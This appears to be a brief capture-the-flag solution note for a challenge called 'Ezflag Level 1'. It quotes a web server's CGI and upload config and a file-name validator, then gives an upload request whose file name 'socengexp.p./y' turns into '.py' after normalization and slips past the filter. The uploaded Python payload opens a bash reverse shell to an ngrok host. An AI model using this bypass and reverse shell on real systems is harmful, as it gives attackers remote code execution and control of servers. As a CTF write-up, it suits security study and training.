Ezflag Level 1

alias.url += ( "/cgi-bin" => "/var/www/cgi-bin" )
alias.url += ( "/uploads" => "/var/www/upload" )
cgi.assign = ( ".py" => "/usr/bin/python3" )

def valid_file_name(name) -> bool:
    if len(name) == 0 or name[0] == '/':
        return False
    if '..' in name:
        return False
    if '.py' in name:
        return False
    return True

normalized_name = item.filename.strip().replace('./', '')

Content-Disposition: form-data; name="file"; filename="socengexp.p./y"
Content-Type: text/x-python-script

import os

os.system('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/15273 0>&1"')